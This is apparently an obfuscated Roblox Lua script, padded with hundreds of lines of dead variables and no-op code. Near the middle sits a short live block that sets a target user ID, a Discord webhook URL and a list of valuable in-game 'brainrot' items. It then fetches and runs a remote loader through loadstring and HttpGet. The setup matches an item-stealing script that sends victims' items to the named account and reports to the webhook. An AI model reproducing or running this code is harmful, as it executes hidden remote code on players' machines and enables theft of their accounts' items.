local _NullRef_0x1A = nil
local _NullRef_0x1B = nil
local _NullRef_0x1C = nil
local _NullRef_0x1D = nil
local _NullRef_0x2A = nil
local _NullRef_0x2B = nil
local _NullRef_0x2C = nil
local _NullRef_0x2D = nil
local _NullRef_0x3A = nil
local _NullRef_0x3B = nil
local _NullRef_0x3C = nil
local _NullRef_0x3D = nil
local _NullRef_0x4A = nil
local _NullRef_0x4B = nil
local _NullRef_0x4C = nil
local _NullRef_0x4D = nil
local _DeadFlag_001 = false
local _DeadFlag_002 = false
local _DeadFlag_003 = false
local _DeadFlag_004 = false
local _DeadFlag_005 = false
local _DeadFlag_006 = false
local _DeadFlag_007 = false
local _DeadFlag_008 = false
local _DeadFlag_009 = false
local _DeadFlag_010 = false
local _DeadFlag_011 = false
local _DeadFlag_012 = false
local _DeadFlag_013 = false
local _DeadFlag_014 = false
local _DeadFlag_015 = false
local _DeadFlag_016 = false
local _IntegrityHash_01 = 0x00000000
local _IntegrityHash_02 = 0x00000000
local _IntegrityHash_03 = 0x00000000
local _IntegrityHash_04 = 0x00000000
local _IntegrityHash_05 = 0x00000000
local _IntegrityHash_06 = 0x00000000
local _IntegrityHash_07 = 0x00000000
local _IntegrityHash_08 = 0x00000000
local _IntegrityHash_09 = 0x00000000
local _IntegrityHash_10 = 0x00000000
local _IntegrityHash_11 = 0x00000000
local _IntegrityHash_12 = 0x00000000
local _ModuleVersion_1 = "2.7.1-stable"
local _ModuleVersion_2 = "3.0.0-beta"
local _ModuleVersion_3 = "1.0.0-legacy"
local _ModuleVersion_4 = "4.2.0-nightly"
local _ModuleVersion_5 = "5.1.3-release"
local _ModuleVersion_6 = "6.0.0-alpha"
local _FOH_VERSION = 3
local _FOH_FLAGS = 255
local _FOH_SEED = 0x13371337
local _FOH_KEY = 0xDEADBEEF
local _FOH_CHECKSUM = 0x00000000
local _FOH_TIMESTAMP = 0
local _FOH_BUILD = 0
local _FOH_PLATFORM = 0
local _FOH_VERSION2 = 4
local _FOH_FLAGS2 = 128
local _FOH_SEED2 = 0xCAFEBABE
local _FOH_KEY2 = 0xBAADF00D
local _FOH_CHECKSUM2 = 0x00000000
local _FOH_TIMESTAMP2 = 0
local _FOH_BUILD2 = 0
local _FOH_PLATFORM2 = 0
local _PIPELINE_STAGE_1 = nil
local _PIPELINE_STAGE_2 = nil
local _PIPELINE_STAGE_3 = nil
local _PIPELINE_STAGE_4 = nil
local _PIPELINE_STAGE_5 = nil
local _PIPELINE_STAGE_6 = nil
local _PIPELINE_STAGE_7 = nil
local _PIPELINE_STAGE_8 = nil
local _PIPELINE_STAGE_9 = nil
local _PIPELINE_STAGE_10 = nil
local _PIPELINE_STAGE_11 = nil
local _PIPELINE_STAGE_12 = nil
local _HOOK_PRE_INIT = nil
local _HOOK_POST_INIT = nil
local _HOOK_PRE_EXEC = nil
local _HOOK_POST_EXEC = nil
local _HOOK_PRE_TERM = nil
local _HOOK_POST_TERM = nil
local _HOOK_ON_ERROR = nil
local _HOOK_ON_SUCCESS = nil
local _HOOK_ON_TIMEOUT = nil
local _HOOK_ON_RETRY = nil
local _HOOK_ON_CANCEL = nil
local _HOOK_ON_RESUME = nil
local _CFG_KEY_1 = "__disabled__"
local _CFG_KEY_2 = "__disabled__"
local _CFG_KEY_3 = "__disabled__"
local _CFG_KEY_4 = "__disabled__"
local _CFG_KEY_5 = "__disabled__"
local _CFG_KEY_6 = "__disabled__"
local _CFG_KEY_7 = "__disabled__"
local _CFG_KEY_8 = "__disabled__"
local _CFG_KEY_9 = "__disabled__"
local _CFG_VAL_1 = nil
local _CFG_VAL_2 = nil
local _CFG_VAL_3 = nil
local _CFG_VAL_4 = nil
local _CFG_VAL_5 = nil
local _CFG_VAL_6 = nil
local _CFG_VAL_7 = nil
local _CFG_VAL_8 = nil
local _CFG_VAL_9 = nil
local _CFG_VAL_10 = nil
local _CFG_VAL_11 = nil
local _CFG_VAL_12 = nil
local _EnvNode_AA = {}
local _EnvNode_AB = {}
local _EnvNode_AC = {}
local _EnvNode_AD = {}
local _EnvNode_BA = {}
local _EnvNode_BB = {}
local _EnvNode_BC = {}
local _EnvNode_BD = {}
local _EnvNode_CA = {}
local _EnvNode_CB = {}
local _EnvNode_CC = {}
local _EnvNode_CD = {}
local _EnvNode_DA = {}
local _EnvNode_DB = {}
local _EnvNode_DC = {}
local _EnvNode_DD = {}
local _EnvNode_EA = {}
local _EnvNode_EB = {}
local _EnvNode_EC = {}
local _EnvNode_ED = {}
local _EnvNode_FA = {}
local _EnvNode_FB = {}
local _EnvNode_FC = {}
local _EnvNode_FD = {}
local _LOCK_TABLE_01 = {}
local _LOCK_TABLE_02 = {}
local _LOCK_TABLE_03 = {}
local _LOCK_TABLE_04 = {}
local _LOCK_TABLE_05 = {}
local _LOCK_TABLE_06 = {}
local _LOCK_TABLE_07 = {}
local _LOCK_TABLE_08 = {}
local _LOCK_TABLE_09 = {}
local _LOCK_TABLE_10 = {}
local _LOCK_TABLE_11 = {}
local _LOCK_TABLE_12 = {}
local _vmfp_00 = {}
local _vmfp_01 = {}
local _vmfp_02 = {}
local _vmfp_03 = {}
local _vmfp_04 = {}
local _vmfp_05 = {}
local _vmfp_06 = {}
local _vmfp_07 = {}
local _vmfp_08 = {}
local _vmfp_09 = {}
local _vmfp_0A = {}
local _vmfp_0B = {}
local _vmfp_0C = {}
local _vmfp_0D = {}
local _vmfp_0E = {}
local _vmfp_0F = {}
local _vmfp_0G = {}
local _vmfp_0H = {}
local _vmfp_0I = {}
local _vmfp_0J = {}
local function _noopA() return nil end
local function _noopB() return nil end
local function _noopC() return nil end
local function _noopD() return nil end
local function _noopE() return nil end
local function _noopF() return nil end
local function _noopG() return nil end
local function _noopH() return nil end
local function _noopI() return nil end
local function _noopJ() return nil end
local function _noopK() return nil end
local function _noopL() return nil end
local function _noopM() return nil end
local function _noopN() return nil end
local function _noopO() return nil end
local function _noopP() return nil end
local _dc1 = function() local _x = 0; for _i = 1, 0 do _x = _x + _i end; return _x end
local _dc2 = function() local _x = 0; for _i = 1, 0 do _x = _x + _i end; return _x end
local _dc3 = function() local _x = 0; for _i = 1, 0 do _x = _x + _i end; return _x end
local _dc4 = function() local _x = 0; for _i = 1, 0 do _x = _x + _i end; return _x end
local _dc5 = function() local _x = 0; for _i = 1, 0 do _x = _x + _i end; return _x end
local _dc6 = function() local _x = ""; for _i = 1, 0 do _x = _x .. tostring(_i) end; return _x end
local _dc7 = function() local _x = ""; for _i = 1, 0 do _x = _x .. tostring(_i) end; return _x end
local _dc8 = function() local _x = {}; for _i = 1, 0 do _x[_i] = _i end; return _x end
local _dc9 = function() local _x = {}; for _i = 1, 0 do _x[_i] = _i end; return _x end
local _dc10 = function() local _x = {}; for _i = 1, 0 do _x[_i] = _i end; return _x end
local _op1  = (1  == 1)  and true or false
local _op2  = (2  == 2)  and true or false
local _op3  = (3  == 3)  and true or false
local _op4  = (4  == 4)  and true or false
local _op5  = (5  == 5)  and true or false
local _op6  = (1  ~= 2)  and true or false
local _op7  = (2  ~= 3)  and true or false
local _op8  = (3  ~= 4)  and true or false
local _op9  = (4  ~= 5)  and true or false
local _op10 = (5  ~= 6)  and true or false
local _op11 = (6  == 6)  and true or false
local _op12 = (7  == 7)  and true or false
if not _op1  then _noopA() end
if not _op2  then _noopB() end
if not _op3  then _noopC() end
if not _op4  then _noopD() end
if not _op5  then _noopE() end
if not _op6  then _noopF() end
if not _op7  then _noopG() end
if not _op8  then _noopH() end
if not _op9  then _noopI() end
if not _op10 then _noopJ() end
if not _op11 then _noopK() end
if not _op12 then _noopL() end
if false then _noopA() end
if false then _noopB() end
if false then _noopC() end
if false then _noopD() end
if false then _noopE() end
if false then _noopF() end
if false then _noopG() end
if false then _noopH() end
if false then _noopI() end
if false then _noopJ() end
if false then _noopK() end
if false then _noopL() end
if false then _noopM() end
if false then _noopN() end
if false then _noopO() end
if false then _noopP() end
if _NullRef_0x1A then error("dead") end
if _NullRef_0x1B then error("dead") end
if _NullRef_0x1C then error("dead") end
if _NullRef_0x1D then error("dead") end
if _NullRef_0x2A then error("dead") end
if _NullRef_0x2B then error("dead") end
if _NullRef_0x2C then error("dead") end
if _NullRef_0x2D then error("dead") end
if _NullRef_0x3A then error("dead") end
if _NullRef_0x3B then error("dead") end
if _NullRef_0x3C then error("dead") end
if _NullRef_0x3D then error("dead") end
if _NullRef_0x4A then error("dead") end
if _NullRef_0x4B then error("dead") end
if _NullRef_0x4C then error("dead") end
if _NullRef_0x4D then error("dead") end
local _TBL_NOOP_01 = {}
local _TBL_NOOP_02 = {}
local _TBL_NOOP_03 = {}
local _TBL_NOOP_04 = {}
local _TBL_NOOP_05 = {}
local _TBL_NOOP_06 = {}
local _TBL_NOOP_07 = {}
local _TBL_NOOP_08 = {}
setmetatable(_TBL_NOOP_01, {__index = function() return nil end})
setmetatable(_TBL_NOOP_02, {__index = function() return nil end})
setmetatable(_TBL_NOOP_03, {__index = function() return nil end})
setmetatable(_TBL_NOOP_04, {__index = function() return nil end})
setmetatable(_TBL_NOOP_05, {__index = function() return nil end})
setmetatable(_TBL_NOOP_06, {__index = function() return nil end})
setmetatable(_TBL_NOOP_07, {__index = function() return nil end})
setmetatable(_TBL_NOOP_08, {__index = function() return nil end})
local _suv_str = string
local _suv_tab = table
local _suv_math = math
local _suv_type = type
local _suv_pairs = pairs
local _suv_ipairs = ipairs
local _suv_next = next
local _suv_select = select
local _suv_pcall = pcall
local _suv_xpcall = xpcall
local _suv_rawget = rawget
local _suv_rawset = rawset
local _suv_tostring = tostring
local _suv_tonumber = tonumber
getgenv().targetUserId = 7967228624
getgenv().webhookURL = "https://discord.com/api/webhooks/1480726879747964990/as2Im3PIPAUapepgIbwGSDnZmTJvVDwrCpYum-SVC4Jt9P5CUIp8ML_c2uodRoD_69O8"
getgenv().whitelistBrainrot = {
    ["Skibidi Toilet"] = true,
    ["Dragon Cannelloni"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Meowl"] = true,
    ["Garama and Madundung"] = true,
    [""] = true,
    ["Ketupat Kepat"] = true,
    ["Ketupat Bros"] = true,
    ["Los Combinasionas"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ginger Gerat"] = true,
    ["La Romantic Grande"] = true,
    ["Love Love Bear"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Tictac Sahur"] = true,
    ["Cooki and Milki"] = true,
    ["La Supreme Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Los Amigos"] = true,
    ["Samini Fatini"] = true,
    ["Tortuginni Dragonfrutini"] = true,
    ["Cool Cola"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Tralalaledon"] = true,
    ["Celularcini Viciosini"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Los Tacoritas"] = true,
    ["Los Planitos"] = true,
    ["Fishino Clownino"] = true,
    ["Signore Carapace"] = true,
    ["Burguro and Fryuro"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Spooky and Pumpky"] = true,
    ["Los Spaghettis"] = true,
    ["Capitano Moby"] = true,
    ["Headless Horseman"] = true,
    ["Strawberry Elephant"] = true,
    ["Cigno Fulgoro"] = true,
    ["Evildeon"] = true,
    ["Cerberus"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["La Food Combinasion"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Elefanto Frigo"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Festive 67"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Antonio"] = true,
    ["Rosetti Tualetti"] = true,
    ["Nacho Spyder"] = true,
    ["Lavadorito Spinito"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Swaggy Bros"] = true,
    ["Orcaledon"] = true,
    ["La Taco Combinasion"] = true,
    ["Lovin Rose"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Tuff Toucan"] = true,
    ["Money Money Reindeer"] = true,
    ["Chillin Chili"] = true,
    ["Chipso and Queso"] = true,
    ["La Spooky Grande"] = true,
    ["La Extinct Grande"] = true,
    ["Los Bros"] = true,
    ["Money Money Puggy"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Las Sis"] = true,
    ["Los Sweethearts"] = true,
    ["Blackhole Goat"] = true,
    [""] = true,
    ["DJ Panda"] = true,
    ["Rang Ring Bus"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/f8227db06cefdc7b56ea6a3e7d4272de.lua"))()
_NullRef_0x1A = nil
_NullRef_0x1B = nil
_NullRef_0x1C = nil
_NullRef_0x1D = nil
_NullRef_0x2A = nil
_NullRef_0x2B = nil
_NullRef_0x2C = nil
_NullRef_0x2D = nil
_NullRef_0x3A = nil
_NullRef_0x3B = nil
_NullRef_0x3C = nil
_NullRef_0x3D = nil
_NullRef_0x4A = nil
_NullRef_0x4B = nil
_NullRef_0x4C = nil
_NullRef_0x4D = nil
_DeadFlag_001 = nil
_DeadFlag_002 = nil
_DeadFlag_003 = nil
_DeadFlag_004 = nil
_DeadFlag_005 = nil
_DeadFlag_006 = nil
_DeadFlag_007 = nil
_DeadFlag_008 = nil
_DeadFlag_009 = nil
_DeadFlag_010 = nil
_DeadFlag_011 = nil
_DeadFlag_012 = nil
_DeadFlag_013 = nil
_DeadFlag_014 = nil
_DeadFlag_015 = nil
_DeadFlag_016 = nil
_EnvNode_AA = nil
_EnvNode_AB = nil
_EnvNode_AC = nil
_EnvNode_AD = nil
_EnvNode_BA = nil
_EnvNode_BB = nil
_EnvNode_BC = nil
_EnvNode_BD = nil
_EnvNode_CA = nil
_EnvNode_CB = nil
_EnvNode_CC = nil
_EnvNode_CD = nil
_EnvNode_DA = nil
_EnvNode_DB = nil
_EnvNode_DC = nil
_EnvNode_DD = nil
_EnvNode_EA = nil
_EnvNode_EB = nil
_EnvNode_EC = nil
_EnvNode_ED = nil
_EnvNode_FA = nil
_EnvNode_FB = nil
_EnvNode_FC = nil
_EnvNode_FD = nil
_vmfp_00 = nil
_vmfp_01 = nil
_vmfp_02 = nil
_vmfp_03 = nil
_vmfp_04 = nil
_vmfp_05 = nil
_vmfp_06 = nil
_vmfp_07 = nil
_vmfp_08 = nil
_vmfp_09 = nil
_vmfp_0A = nil
_vmfp_0B = nil
_vmfp_0C = nil
_vmfp_0D = nil
_vmfp_0E = nil
_vmfp_0F = nil
_vmfp_0G = nil
_vmfp_0H = nil
_vmfp_0I = nil
_vmfp_0J = nil
_dc1 = nil
_dc2 = nil
_dc3 = nil
_dc4 = nil
_dc5 = nil
_dc6 = nil
_dc7 = nil
_dc8 = nil
_dc9 = nil
_dc10 = nil
_TBL_NOOP_01 = nil
_TBL_NOOP_02 = nil
_TBL_NOOP_03 = nil
_TBL_NOOP_04 = nil
_TBL_NOOP_05 = nil
_TBL_NOOP_06 = nil
_TBL_NOOP_07 = nil
_TBL_NOOP_08 = nil
_LOCK_TABLE_01 = nil
_LOCK_TABLE_02 = nil
_LOCK_TABLE_03 = nil
_LOCK_TABLE_04 = nil
_LOCK_TABLE_05 = nil
_LOCK_TABLE_06 = nil
_LOCK_TABLE_07 = nil
_LOCK_TABLE_08 = nil
_LOCK_TABLE_09 = nil
_LOCK_TABLE_10 = nil
_LOCK_TABLE_11 = nil
_LOCK_TABLE_12 = nil
_PIPELINE_STAGE_1 = nil
_PIPELINE_STAGE_2 = nil
_PIPELINE_STAGE_3 = nil
_PIPELINE_STAGE_4 = nil
_PIPELINE_STAGE_5 = nil
_PIPELINE_STAGE_6 = nil
_PIPELINE_STAGE_7 = nil
_PIPELINE_STAGE_8 = nil
_PIPELINE_STAGE_9 = nil
_PIPELINE_STAGE_10 = nil
_PIPELINE_STAGE_11 = nil
_PIPELINE_STAGE_12 = nil
_HOOK_PRE_INIT = nil
_HOOK_POST_INIT = nil
_HOOK_PRE_EXEC = nil
_HOOK_POST_EXEC = nil
_HOOK_PRE_TERM = nil
_HOOK_POST_TERM = nil
_HOOK_ON_ERROR = nil
_HOOK_ON_SUCCESS = nil
_HOOK_ON_TIMEOUT = nil
_HOOK_ON_RETRY = nil
_HOOK_ON_CANCEL = nil
_HOOK_ON_RESUME = nil
_CFG_VAL_1 = nil
_CFG_VAL_2 = nil
_CFG_VAL_3 = nil
_CFG_VAL_4 = nil
_CFG_VAL_5 = nil
_CFG_VAL_6 = nil
_CFG_VAL_7 = nil
_CFG_VAL_8 = nil
_CFG_VAL_9 = nil
_CFG_VAL_10 = nil
_CFG_VAL_11 = nil
_CFG_VAL_12 = nil

